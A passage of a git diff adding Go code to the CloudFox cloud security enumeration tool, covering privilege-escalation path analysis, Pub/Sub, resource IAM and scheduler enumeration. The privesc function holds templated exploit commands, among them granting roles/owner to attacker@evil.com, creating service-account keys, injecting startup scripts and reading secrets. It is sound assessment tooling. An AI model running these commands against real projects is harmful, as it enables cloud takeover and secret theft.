"roles/iam.serviceAccountKeyAdmin": { + "iam.serviceAccountKeys.create", + }, + "roles/iam.serviceAccountTokenCreator": { + 
"iam.serviceAccounts.getAccessToken", + "iam.serviceAccounts.signBlob", + "iam.serviceAccounts.signJwt", + }, + "roles/compute.instanceAdmin": { + "compute.instances.setMetadata", + "compute.instances.setServiceAccount", + }, + "roles/cloudfunctions.developer": { + "cloudfunctions.functions.create", + "cloudfunctions.functions.update", + }, + "roles/run.admin": { + "run.services.create", + "run.services.update", + }, + "roles/cloudbuild.builds.editor": { + "cloudbuild.builds.create", + }, + } + + if perms, ok := knownRoles[role]; ok { + return perms + } + + return []string{} +} + +// analyzePermissionsForPrivesc checks if a set of permissions enables privilege escalation +func (s *PrivescService) analyzePermissionsForPrivesc(member, role string, permissions []string, projectID string) []PrivescPath { + var paths []PrivescPath + + dangerousPerms := GetDangerousPermissions() + dangerousMap := make(map[string]DangerousPermission) + for _, dp := range dangerousPerms { + dangerousMap[dp.Permission] = dp + } + + // Check for direct dangerous permissions + foundDangerous := make(map[string]DangerousPermission) + for _, perm := range permissions { + if dp, ok := dangerousMap[perm]; ok { + foundDangerous[perm] = dp + } + } + + // Generate privesc paths based on found permissions + principalType := getPrincipalType(member) + cleanMember := cleanMemberName(member) + + // SA Token Creation + if dp, ok := foundDangerous["iam.serviceAccounts.getAccessToken"]; ok { + paths = append(paths, PrivescPath{ + Principal: cleanMember, + PrincipalType: principalType, + Method: "SA Token Creation", + TargetResource: "All project service accounts", + Permissions: []string{dp.Permission}, + RiskLevel: dp.RiskLevel, + Description: "Can generate access tokens for any service account in the project", + ExploitCommand: fmt.Sprintf("gcloud auth print-access-token --impersonate-service-account=TARGET_SA@%s.iam.gserviceaccount.com", projectID), + ProjectID: projectID, + }) + } + + // SA Key 
Creation + if dp, ok := foundDangerous["iam.serviceAccountKeys.create"]; ok { + paths = append(paths, PrivescPath{ + Principal: cleanMember, + PrincipalType: principalType, + Method: "SA Key Creation", + TargetResource: "All project service accounts", + Permissions: []string{dp.Permission}, + RiskLevel: dp.RiskLevel, + Description: "Can create persistent keys for any service account", + ExploitCommand: fmt.Sprintf("gcloud iam service-accounts keys create key.json --iam-account=TARGET_SA@%s.iam.gserviceaccount.com", projectID), + ProjectID: projectID, + }) + } + + // Project IAM Modification + if dp, ok := foundDangerous["resourcemanager.projects.setIamPolicy"]; ok { + paths = append(paths, PrivescPath{ + Principal: cleanMember, + PrincipalType: principalType, + Method: "Project IAM Modification", + TargetResource: projectID, + Permissions: []string{dp.Permission}, + RiskLevel: dp.RiskLevel, + Description: "Can modify project IAM policy to grant any role", + ExploitCommand: fmt.Sprintf("gcloud projects add-iam-policy-binding %s --member=user:attacker@evil.com --role=roles/owner", projectID), + ProjectID: projectID, + }) + } + + // Compute Metadata Modification + if dp, ok := foundDangerous["compute.instances.setMetadata"]; ok { + paths = append(paths, PrivescPath{ + Principal: cleanMember, + PrincipalType: principalType, + Method: "Compute Metadata Injection", + TargetResource: "All project instances", + Permissions: []string{dp.Permission}, + RiskLevel: dp.RiskLevel, + Description: "Can inject SSH keys or startup scripts into instances", + ExploitCommand: "gcloud compute instances add-metadata INSTANCE --metadata=startup-script='#!/bin/bash\\nwhoami > /tmp/pwned'", + ProjectID: projectID, + }) + } + + // Cloud Functions Deployment + if _, ok := foundDangerous["cloudfunctions.functions.create"]; ok { + if _, hasActAs := foundDangerous["iam.serviceAccounts.actAs"]; hasActAs { + paths = append(paths, PrivescPath{ + Principal: cleanMember, + PrincipalType: 
principalType, + Method: "Cloud Functions SA Abuse", + TargetResource: "Cloud Functions", + Permissions: []string{"cloudfunctions.functions.create", "iam.serviceAccounts.actAs"}, + RiskLevel: "HIGH", + Description: "Can deploy functions with privileged service account identity", + ExploitCommand: "gcloud functions deploy pwned --runtime=python39 --trigger-http --service-account=PRIVILEGED_SA", + ProjectID: projectID, + }) + } + } + + // Cloud Build + if dp, ok := foundDangerous["cloudbuild.builds.create"]; ok { + paths = append(paths, PrivescPath{ + Principal: cleanMember, + PrincipalType: principalType, + Method: "Cloud Build SA Abuse", + TargetResource: "Cloud Build", + Permissions: []string{dp.Permission}, + RiskLevel: dp.RiskLevel, + Description: "Can run builds with Cloud Build service account (often has elevated privileges)", + ExploitCommand: "gcloud builds submit --config=cloudbuild.yaml .", + ProjectID: projectID, + }) + } + + // GKE Credentials + if dp, ok := foundDangerous["container.clusters.getCredentials"]; ok { + paths = append(paths, PrivescPath{ + Principal: cleanMember, + PrincipalType: principalType, + Method: "GKE Cluster Access", + TargetResource: "All project GKE clusters", + Permissions: []string{dp.Permission}, + RiskLevel: dp.RiskLevel, + Description: "Can get credentials for GKE clusters", + ExploitCommand: "gcloud container clusters get-credentials CLUSTER_NAME --zone=ZONE", + ProjectID: projectID, + }) + } + + // Secret Access + if dp, ok := foundDangerous["secretmanager.versions.access"]; ok { + paths = append(paths, PrivescPath{ + Principal: cleanMember, + PrincipalType: principalType, + Method: "Secret Access", + TargetResource: "All project secrets", + Permissions: []string{dp.Permission}, + RiskLevel: dp.RiskLevel, + Description: "Can read secret values from Secret Manager", + ExploitCommand: "gcloud secrets versions access latest --secret=SECRET_NAME", + ProjectID: projectID, + }) + } + + // SignBlob for GCS Signed URLs + if dp, ok 
:= foundDangerous["iam.serviceAccounts.signBlob"]; ok { + paths = append(paths, PrivescPath{ + Principal: cleanMember, + PrincipalType: principalType, + Method: "GCS Signed URL Generation", + TargetResource: "All project service accounts", + Permissions: []string{dp.Permission}, + RiskLevel: dp.RiskLevel, + Description: "Can sign blobs as SA to generate GCS signed URLs", + ExploitCommand: "gsutil signurl -u TARGET_SA@project.iam.gserviceaccount.com gs://bucket/object", + ProjectID: projectID, + }) + } + + return paths +} + +// getPrincipalType determines the type of principal from the member string +func getPrincipalType(member string) string { + if strings.HasPrefix(member, "user:") { + return "user" + } else if strings.HasPrefix(member, "serviceAccount:") { + return "serviceAccount" + } else if strings.HasPrefix(member, "group:") { + return "group" + } else if strings.HasPrefix(member, "domain:") { + return "domain" + } else if member == "allUsers" { + return "allUsers" + } else if member == "allAuthenticatedUsers" { + return "allAuthenticatedUsers" + } + return "unknown" +} + +// cleanMemberName removes the prefix from member string +func cleanMemberName(member string) string { + parts := strings.SplitN(member, ":", 2) + if len(parts) == 2 { + return parts[1] + } + return member +} diff --git a/gcp/services/pubsubService/pubsubService.go b/gcp/services/pubsubService/pubsubService.go new file mode 100644 index 00000000..89fdbb9b --- /dev/null +++ b/gcp/services/pubsubService/pubsubService.go @@ -0,0 +1,293 @@ +package pubsubservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + pubsub "google.golang.org/api/pubsub/v1" +) + +type PubSubService struct{} + +func New() *PubSubService { + return &PubSubService{} +} + +// IAMBinding represents a single IAM role/member binding +type IAMBinding struct { + Role string `json:"role"` + Member string `json:"member"` +} + +// TopicInfo holds Pub/Sub topic details 
with security-relevant information +type TopicInfo struct { + Name string + ProjectID string + KmsKeyName string // Encryption key if set + MessageRetentionDuration string + SchemaSettings string + Labels map[string]string + + // IAM bindings + IAMBindings []IAMBinding + + // Subscriptions count + SubscriptionCount int +} + +// SubscriptionInfo holds Pub/Sub subscription details +type SubscriptionInfo struct { + Name string + ProjectID string + Topic string + TopicProject string // Topic may be in different project + + // Configuration + AckDeadlineSeconds int64 + MessageRetention string + RetainAckedMessages bool + ExpirationPolicy string // TTL + Filter string + + // Push configuration + PushEndpoint string // Empty if pull subscription + PushOIDCAudience string + PushServiceAccount string + + // Dead letter + DeadLetterTopic string + MaxDeliveryAttempts int64 + + // BigQuery export + BigQueryTable string + + // Cloud Storage export + CloudStorageBucket string + + // IAM bindings + IAMBindings []IAMBinding +} + +// Topics retrieves all Pub/Sub topics in a project +func (ps *PubSubService) Topics(projectID string) ([]TopicInfo, error) { + ctx := context.Background() + + service, err := pubsub.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "pubsub.googleapis.com") + } + + var topics []TopicInfo + parent := fmt.Sprintf("projects/%s", projectID) + + call := service.Projects.Topics.List(parent) + err = call.Pages(ctx, func(page *pubsub.ListTopicsResponse) error { + for _, topic := range page.Topics { + info := parseTopicInfo(topic, projectID) + + // Get subscription count + subCount, _ := ps.getTopicSubscriptionCount(service, topic.Name) + info.SubscriptionCount = subCount + + // Try to get IAM policy + iamPolicy, iamErr := ps.getTopicIAMPolicy(service, topic.Name) + if iamErr == nil && iamPolicy != nil { + info.IAMBindings = parseIAMBindings(iamPolicy) + } + + topics = append(topics, info) + } + return nil + }) + + if err != nil { + 
return nil, gcpinternal.ParseGCPError(err, "pubsub.googleapis.com") + } + + return topics, nil +} + +// Subscriptions retrieves all Pub/Sub subscriptions in a project +func (ps *PubSubService) Subscriptions(projectID string) ([]SubscriptionInfo, error) { + ctx := context.Background() + + service, err := pubsub.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "pubsub.googleapis.com") + } + + var subscriptions []SubscriptionInfo + parent := fmt.Sprintf("projects/%s", projectID) + + call := service.Projects.Subscriptions.List(parent) + err = call.Pages(ctx, func(page *pubsub.ListSubscriptionsResponse) error { + for _, sub := range page.Subscriptions { + info := parseSubscriptionInfo(sub, projectID) + + // Try to get IAM policy + iamPolicy, iamErr := ps.getSubscriptionIAMPolicy(service, sub.Name) + if iamErr == nil && iamPolicy != nil { + info.IAMBindings = parseIAMBindings(iamPolicy) + } + + subscriptions = append(subscriptions, info) + } + return nil + }) + + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "pubsub.googleapis.com") + } + + return subscriptions, nil +} + +// parseTopicInfo extracts relevant information from a Pub/Sub topic +func parseTopicInfo(topic *pubsub.Topic, projectID string) TopicInfo { + info := TopicInfo{ + Name: extractName(topic.Name), + ProjectID: projectID, + Labels: topic.Labels, + } + + if topic.KmsKeyName != "" { + info.KmsKeyName = topic.KmsKeyName + } + + if topic.MessageRetentionDuration != "" { + info.MessageRetentionDuration = topic.MessageRetentionDuration + } + + if topic.SchemaSettings != nil { + info.SchemaSettings = fmt.Sprintf("%s (%s)", + extractName(topic.SchemaSettings.Schema), + topic.SchemaSettings.Encoding) + } + + return info +} + +// parseSubscriptionInfo extracts relevant information from a Pub/Sub subscription +func parseSubscriptionInfo(sub *pubsub.Subscription, projectID string) SubscriptionInfo { + info := SubscriptionInfo{ + Name: sub.Name, + ProjectID: projectID, + 
Topic: extractName(sub.Topic), + AckDeadlineSeconds: sub.AckDeadlineSeconds, + RetainAckedMessages: sub.RetainAckedMessages, + Filter: sub.Filter, + } + + // Extract name from full path + info.Name = extractName(sub.Name) + + // Extract topic project (may be different from subscription project) + if strings.Contains(sub.Topic, "/") { + parts := strings.Split(sub.Topic, "/") + if len(parts) >= 2 { + info.TopicProject = parts[1] + } + } + + // Message retention + if sub.MessageRetentionDuration != "" { + info.MessageRetention = sub.MessageRetentionDuration + } + + // Expiration policy + if sub.ExpirationPolicy != nil && sub.ExpirationPolicy.Ttl != "" { + info.ExpirationPolicy = sub.ExpirationPolicy.Ttl + } + + // Push configuration + if sub.PushConfig != nil { + info.PushEndpoint = sub.PushConfig.PushEndpoint + + if sub.PushConfig.OidcToken != nil { + info.PushServiceAccount = sub.PushConfig.OidcToken.ServiceAccountEmail + info.PushOIDCAudience = sub.PushConfig.OidcToken.Audience + } + } + + // Dead letter policy + if sub.DeadLetterPolicy != nil { + info.DeadLetterTopic = extractName(sub.DeadLetterPolicy.DeadLetterTopic) + info.MaxDeliveryAttempts = sub.DeadLetterPolicy.MaxDeliveryAttempts + } + + // BigQuery config + if sub.BigqueryConfig != nil { + info.BigQueryTable = sub.BigqueryConfig.Table + } + + // Cloud Storage config + if sub.CloudStorageConfig != nil { + info.CloudStorageBucket = sub.CloudStorageConfig.Bucket + } + + return info +} + +// getTopicSubscriptionCount counts subscriptions for a topic +func (ps *PubSubService) getTopicSubscriptionCount(service *pubsub.Service, topicName string) (int, error) { + ctx := context.Background() + + resp, err := service.Projects.Topics.Subscriptions.List(topicName).Context(ctx).Do() + if err != nil { + return 0, err + } + + return len(resp.Subscriptions), nil +} + +// getTopicIAMPolicy retrieves the IAM policy for a topic +func (ps *PubSubService) getTopicIAMPolicy(service *pubsub.Service, topicName string) 
(*pubsub.Policy, error) { + ctx := context.Background() + + policy, err := service.Projects.Topics.GetIamPolicy(topicName).Context(ctx).Do() + if err != nil { + return nil, err + } + + return policy, nil +} + +// getSubscriptionIAMPolicy retrieves the IAM policy for a subscription +func (ps *PubSubService) getSubscriptionIAMPolicy(service *pubsub.Service, subscriptionName string) (*pubsub.Policy, error) { + ctx := context.Background() + + policy, err := service.Projects.Subscriptions.GetIamPolicy(subscriptionName).Context(ctx).Do() + if err != nil { + return nil, err + } + + return policy, nil +} + +// parseIAMBindings extracts all IAM bindings from a policy +func parseIAMBindings(policy *pubsub.Policy) []IAMBinding { + var bindings []IAMBinding + for _, binding := range policy.Bindings { + if binding == nil { + continue + } + for _, member := range binding.Members { + bindings = append(bindings, IAMBinding{ + Role: binding.Role, + Member: member, + }) + } + } + return bindings +} + +// extractName extracts just the resource name from the full resource name +func extractName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} diff --git a/gcp/services/resourceIAMService/resourceIAMService.go b/gcp/services/resourceIAMService/resourceIAMService.go new file mode 100644 index 00000000..dbea1fb2 --- /dev/null +++ b/gcp/services/resourceIAMService/resourceIAMService.go @@ -0,0 +1,649 @@ +package resourceiamservice + +import ( + "context" + "fmt" + "strings" + + "cloud.google.com/go/bigquery" + "cloud.google.com/go/kms/apiv1" + "cloud.google.com/go/kms/apiv1/kmspb" + "cloud.google.com/go/pubsub" + "cloud.google.com/go/storage" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + run "google.golang.org/api/run/v1" + secretmanager "google.golang.org/api/secretmanager/v1" + "google.golang.org/api/iterator" + "google.golang.org/api/option" + cloudfunctions 
"google.golang.org/api/cloudfunctions/v1" +) + +// ResourceIAMService handles enumeration of resource-level IAM policies +type ResourceIAMService struct { + session *gcpinternal.SafeSession +} + +// New creates a new ResourceIAMService +func New() *ResourceIAMService { + return &ResourceIAMService{} +} + +// NewWithSession creates a ResourceIAMService with a SafeSession +func NewWithSession(session *gcpinternal.SafeSession) *ResourceIAMService { + return &ResourceIAMService{session: session} +} + +// getClientOption returns the appropriate client option based on session +func (s *ResourceIAMService) getClientOption() option.ClientOption { + if s.session != nil { + return s.session.GetClientOption() + } + return nil +} + +// ResourceIAMBinding represents an IAM binding on a specific resource +type ResourceIAMBinding struct { + ResourceType string `json:"resourceType"` // bucket, dataset, topic, secret, etc. + ResourceName string `json:"resourceName"` // Full resource name + ResourceID string `json:"resourceId"` // Short identifier + ProjectID string `json:"projectId"` + Role string `json:"role"` + Member string `json:"member"` + MemberType string `json:"memberType"` // user, serviceAccount, group, allUsers, allAuthenticatedUsers + MemberEmail string `json:"memberEmail"` + IsPublic bool `json:"isPublic"` // allUsers or allAuthenticatedUsers + HasCondition bool `json:"hasCondition"` + ConditionTitle string `json:"conditionTitle"` + ConditionExpression string `json:"conditionExpression"` // Full CEL expression +} + +// GetAllResourceIAM enumerates IAM policies across all supported resource types +func (s *ResourceIAMService) GetAllResourceIAM(ctx context.Context, projectID string) ([]ResourceIAMBinding, error) { + var allBindings []ResourceIAMBinding + + // Get bucket IAM + bucketBindings, err := s.GetBucketIAM(ctx, projectID) + if err == nil { + allBindings = append(allBindings, bucketBindings...) 
+ } + + // Get BigQuery dataset IAM + bqBindings, err := s.GetBigQueryDatasetIAM(ctx, projectID) + if err == nil { + allBindings = append(allBindings, bqBindings...) + } + + // Get Pub/Sub topic IAM + pubsubBindings, err := s.GetPubSubIAM(ctx, projectID) + if err == nil { + allBindings = append(allBindings, pubsubBindings...) + } + + // Get Secret Manager IAM + secretBindings, err := s.GetSecretManagerIAM(ctx, projectID) + if err == nil { + allBindings = append(allBindings, secretBindings...) + } + + // Get KMS IAM + kmsBindings, err := s.GetKMSIAM(ctx, projectID) + if err == nil { + allBindings = append(allBindings, kmsBindings...) + } + + // Get Cloud Functions IAM + functionBindings, err := s.GetCloudFunctionsIAM(ctx, projectID) + if err == nil { + allBindings = append(allBindings, functionBindings...) + } + + // Get Cloud Run IAM + runBindings, err := s.GetCloudRunIAM(ctx, projectID) + if err == nil { + allBindings = append(allBindings, runBindings...) + } + + return allBindings, nil +} + +// GetBucketIAM enumerates IAM policies on Cloud Storage buckets +func (s *ResourceIAMService) GetBucketIAM(ctx context.Context, projectID string) ([]ResourceIAMBinding, error) { + var bindings []ResourceIAMBinding + + var client *storage.Client + var err error + if s.session != nil { + client, err = storage.NewClient(ctx, s.getClientOption()) + } else { + client, err = storage.NewClient(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "storage.googleapis.com") + } + defer client.Close() + + // List buckets + it := client.Buckets(ctx, projectID) + for { + bucketAttrs, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + break + } + + // Get IAM policy for this bucket + bucket := client.Bucket(bucketAttrs.Name) + policy, err := bucket.IAM().Policy(ctx) + if err != nil { + continue + } + + // Convert policy to bindings + for _, role := range policy.Roles() { + for _, member := range policy.Members(role) { + binding := 
ResourceIAMBinding{ + ResourceType: "bucket", + ResourceName: fmt.Sprintf("gs://%s", bucketAttrs.Name), + ResourceID: bucketAttrs.Name, + ProjectID: projectID, + Role: string(role), + Member: member, + MemberType: determineMemberType(member), + MemberEmail: extractEmail(member), + IsPublic: isPublicMember(member), + } + bindings = append(bindings, binding) + } + } + } + + return bindings, nil +} + +// GetBigQueryDatasetIAM enumerates IAM policies on BigQuery datasets +func (s *ResourceIAMService) GetBigQueryDatasetIAM(ctx context.Context, projectID string) ([]ResourceIAMBinding, error) { + var bindings []ResourceIAMBinding + + var client *bigquery.Client + var err error + if s.session != nil { + client, err = bigquery.NewClient(ctx, projectID, s.getClientOption()) + } else { + client, err = bigquery.NewClient(ctx, projectID) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "bigquery.googleapis.com") + } + defer client.Close() + + // List datasets + it := client.Datasets(ctx) + for { + dataset, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + break + } + + // Get metadata which includes access entries (IAM-like) + meta, err := dataset.Metadata(ctx) + if err != nil { + continue + } + + // BigQuery uses Access entries instead of IAM policies + for _, access := range meta.Access { + member := access.Entity + entityTypeStr := fmt.Sprintf("%v", access.EntityType) + + // Determine member type and if public based on entity type + isPublic := false + memberType := entityTypeStr + + switch access.EntityType { + case bigquery.UserEmailEntity: + memberType = "User" + member = "user:" + access.Entity + case bigquery.GroupEmailEntity: + memberType = "Group" + member = "group:" + access.Entity + case bigquery.DomainEntity: + memberType = "Domain" + member = "domain:" + access.Entity + case bigquery.SpecialGroupEntity: + // Special groups include allAuthenticatedUsers + if access.Entity == "allAuthenticatedUsers" { + memberType = 
"allAuthenticatedUsers" + member = "allAuthenticatedUsers" + isPublic = true + } else { + memberType = "SpecialGroup" + } + case bigquery.IAMMemberEntity: + memberType = determineMemberType(access.Entity) + isPublic = isPublicMember(access.Entity) + } + + if member == "" { + continue + } + + binding := ResourceIAMBinding{ + ResourceType: "dataset", + ResourceName: fmt.Sprintf("%s.%s", projectID, dataset.DatasetID), + ResourceID: dataset.DatasetID, + ProjectID: projectID, + Role: string(access.Role), + Member: member, + MemberType: memberType, + MemberEmail: extractEmail(member), + IsPublic: isPublic, + } + bindings = append(bindings, binding) + } + } + + return bindings, nil +} + +// GetPubSubIAM enumerates IAM policies on Pub/Sub topics and subscriptions +func (s *ResourceIAMService) GetPubSubIAM(ctx context.Context, projectID string) ([]ResourceIAMBinding, error) { + var bindings []ResourceIAMBinding + + var client *pubsub.Client + var err error + if s.session != nil { + client, err = pubsub.NewClient(ctx, projectID, s.getClientOption()) + } else { + client, err = pubsub.NewClient(ctx, projectID) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "pubsub.googleapis.com") + } + defer client.Close() + + // List topics + topicIt := client.Topics(ctx) + for { + topic, err := topicIt.Next() + if err == iterator.Done { + break + } + if err != nil { + break + } + + // Get IAM policy for this topic + policy, err := topic.IAM().Policy(ctx) + if err != nil { + continue + } + + topicID := topic.ID() + for _, role := range policy.Roles() { + for _, member := range policy.Members(role) { + binding := ResourceIAMBinding{ + ResourceType: "topic", + ResourceName: fmt.Sprintf("projects/%s/topics/%s", projectID, topicID), + ResourceID: topicID, + ProjectID: projectID, + Role: string(role), + Member: member, + MemberType: determineMemberType(member), + MemberEmail: extractEmail(member), + IsPublic: isPublicMember(member), + } + bindings = append(bindings, binding) + 
} + } + } + + // List subscriptions + subIt := client.Subscriptions(ctx) + for { + sub, err := subIt.Next() + if err == iterator.Done { + break + } + if err != nil { + break + } + + // Get IAM policy for this subscription + policy, err := sub.IAM().Policy(ctx) + if err != nil { + continue + } + + subID := sub.ID() + for _, role := range policy.Roles() { + for _, member := range policy.Members(role) { + binding := ResourceIAMBinding{ + ResourceType: "subscription", + ResourceName: fmt.Sprintf("projects/%s/subscriptions/%s", projectID, subID), + ResourceID: subID, + ProjectID: projectID, + Role: string(role), + Member: member, + MemberType: determineMemberType(member), + MemberEmail: extractEmail(member), + IsPublic: isPublicMember(member), + } + bindings = append(bindings, binding) + } + } + } + + return bindings, nil +} + +// GetSecretManagerIAM enumerates IAM policies on Secret Manager secrets +func (s *ResourceIAMService) GetSecretManagerIAM(ctx context.Context, projectID string) ([]ResourceIAMBinding, error) { + var bindings []ResourceIAMBinding + + var smService *secretmanager.Service + var err error + if s.session != nil { + smService, err = secretmanager.NewService(ctx, s.getClientOption()) + } else { + smService, err = secretmanager.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "secretmanager.googleapis.com") + } + + // List secrets + parent := fmt.Sprintf("projects/%s", projectID) + resp, err := smService.Projects.Secrets.List(parent).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "secretmanager.googleapis.com") + } + + for _, secret := range resp.Secrets { + // Get IAM policy for this secret + policy, err := smService.Projects.Secrets.GetIamPolicy(secret.Name).Context(ctx).Do() + if err != nil { + continue + } + + secretID := extractSecretID(secret.Name) + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + b := ResourceIAMBinding{ + ResourceType: 
"secret", + ResourceName: secret.Name, + ResourceID: secretID, + ProjectID: projectID, + Role: binding.Role, + Member: member, + MemberType: determineMemberType(member), + MemberEmail: extractEmail(member), + IsPublic: isPublicMember(member), + } + if binding.Condition != nil { + b.HasCondition = true + b.ConditionTitle = binding.Condition.Title + b.ConditionExpression = binding.Condition.Expression + } + bindings = append(bindings, b) + } + } + } + + return bindings, nil +} + +// GetKMSIAM enumerates IAM policies on KMS keys +func (s *ResourceIAMService) GetKMSIAM(ctx context.Context, projectID string) ([]ResourceIAMBinding, error) { + var bindings []ResourceIAMBinding + + var client *kms.KeyManagementClient + var err error + if s.session != nil { + client, err = kms.NewKeyManagementClient(ctx, s.getClientOption()) + } else { + client, err = kms.NewKeyManagementClient(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudkms.googleapis.com") + } + defer client.Close() + + // List key rings in all locations + locations := []string{"global", "us", "us-central1", "us-east1", "us-west1", "europe-west1", "asia-east1"} + + for _, location := range locations { + parent := fmt.Sprintf("projects/%s/locations/%s", projectID, location) + + keyRingIt := client.ListKeyRings(ctx, &kmspb.ListKeyRingsRequest{Parent: parent}) + for { + keyRing, err := keyRingIt.Next() + if err == iterator.Done { + break + } + if err != nil { + break + } + + // List keys in this key ring + keyIt := client.ListCryptoKeys(ctx, &kmspb.ListCryptoKeysRequest{Parent: keyRing.Name}) + for { + key, err := keyIt.Next() + if err == iterator.Done { + break + } + if err != nil { + break + } + + // Get IAM policy for this key + policy, err := client.ResourceIAM(key.Name).Policy(ctx) + if err != nil { + continue + } + + keyID := extractKeyID(key.Name) + for _, role := range policy.Roles() { + for _, member := range policy.Members(role) { + binding := ResourceIAMBinding{ + ResourceType: 
"cryptoKey", + ResourceName: key.Name, + ResourceID: keyID, + ProjectID: projectID, + Role: string(role), + Member: member, + MemberType: determineMemberType(member), + MemberEmail: extractEmail(member), + IsPublic: isPublicMember(member), + } + bindings = append(bindings, binding) + } + } + } + } + } + + return bindings, nil +} + +// GetCloudFunctionsIAM enumerates IAM policies on Cloud Functions +func (s *ResourceIAMService) GetCloudFunctionsIAM(ctx context.Context, projectID string) ([]ResourceIAMBinding, error) { + var bindings []ResourceIAMBinding + + var cfService *cloudfunctions.Service + var err error + if s.session != nil { + cfService, err = cloudfunctions.NewService(ctx, s.getClientOption()) + } else { + cfService, err = cloudfunctions.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudfunctions.googleapis.com") + } + + // List functions across all locations + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + resp, err := cfService.Projects.Locations.Functions.List(parent).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudfunctions.googleapis.com") + } + + for _, fn := range resp.Functions { + // Get IAM policy for this function + policy, err := cfService.Projects.Locations.Functions.GetIamPolicy(fn.Name).Context(ctx).Do() + if err != nil { + continue + } + + fnID := extractFunctionID(fn.Name) + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + b := ResourceIAMBinding{ + ResourceType: "function", + ResourceName: fn.Name, + ResourceID: fnID, + ProjectID: projectID, + Role: binding.Role, + Member: member, + MemberType: determineMemberType(member), + MemberEmail: extractEmail(member), + IsPublic: isPublicMember(member), + } + if binding.Condition != nil { + b.HasCondition = true + b.ConditionTitle = binding.Condition.Title + b.ConditionExpression = binding.Condition.Expression + } + bindings = append(bindings, b) + } + } + } + + return 
bindings, nil +} + +// GetCloudRunIAM enumerates IAM policies on Cloud Run services +func (s *ResourceIAMService) GetCloudRunIAM(ctx context.Context, projectID string) ([]ResourceIAMBinding, error) { + var bindings []ResourceIAMBinding + + var runService *run.APIService + var err error + if s.session != nil { + runService, err = run.NewService(ctx, s.getClientOption()) + } else { + runService, err = run.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "run.googleapis.com") + } + + // List services across all locations + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + resp, err := runService.Projects.Locations.Services.List(parent).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "run.googleapis.com") + } + + for _, svc := range resp.Items { + // Get IAM policy for this service + policy, err := runService.Projects.Locations.Services.GetIamPolicy(svc.Metadata.Name).Context(ctx).Do() + if err != nil { + continue + } + + svcID := svc.Metadata.Name + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + b := ResourceIAMBinding{ + ResourceType: "cloudrun", + ResourceName: svc.Metadata.Name, + ResourceID: svcID, + ProjectID: projectID, + Role: binding.Role, + Member: member, + MemberType: determineMemberType(member), + MemberEmail: extractEmail(member), + IsPublic: isPublicMember(member), + } + if binding.Condition != nil { + b.HasCondition = true + b.ConditionTitle = binding.Condition.Title + b.ConditionExpression = binding.Condition.Expression + } + bindings = append(bindings, b) + } + } + } + + return bindings, nil +} + +// Helper functions + +func determineMemberType(member string) string { + switch { + case member == "allUsers": + return "allUsers" + case member == "allAuthenticatedUsers": + return "allAuthenticatedUsers" + case strings.HasPrefix(member, "user:"): + return "User" + case strings.HasPrefix(member, "serviceAccount:"): + return 
"ServiceAccount" + case strings.HasPrefix(member, "group:"): + return "Group" + case strings.HasPrefix(member, "domain:"): + return "Domain" + case strings.HasPrefix(member, "principal:"): + return "Federated" + case strings.HasPrefix(member, "principalSet:"): + return "FederatedSet" + default: + return "Unknown" + } +} + +func extractEmail(member string) string { + if strings.Contains(member, ":") { + parts := strings.SplitN(member, ":", 2) + if len(parts) == 2 { + return parts[1] + } + } + return member +} + +func isPublicMember(member string) bool { + return member == "allUsers" || member == "allAuthenticatedUsers" +} + +func extractSecretID(name string) string { + // Format: projects/{project}/secrets/{secret} + parts := strings.Split(name, "/") + if len(parts) >= 4 { + return parts[len(parts)-1] + } + return name +} + +func extractKeyID(name string) string { + // Format: projects/{project}/locations/{location}/keyRings/{keyring}/cryptoKeys/{key} + parts := strings.Split(name, "/") + if len(parts) >= 8 { + return parts[len(parts)-1] + } + return name +} + +func extractFunctionID(name string) string { + // Format: projects/{project}/locations/{location}/functions/{function} + parts := strings.Split(name, "/") + if len(parts) >= 6 { + return parts[len(parts)-1] + } + return name +} diff --git a/gcp/services/schedulerService/schedulerService.go b/gcp/services/schedulerService/schedulerService.go new file mode 100644 index 00000000..69b617a7 --- /dev/null +++ b/gcp/services/schedulerService/schedulerService.go @@ -0,0 +1,165 @@ +package schedulerservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + scheduler "google.golang.org/api/cloudscheduler/v1" +) + +type SchedulerService struct{} + +func New() *SchedulerService { + return &SchedulerService{} +} + +// JobInfo holds Cloud Scheduler job details with security-relevant information +type JobInfo struct { + Name string + ProjectID string + Location string 
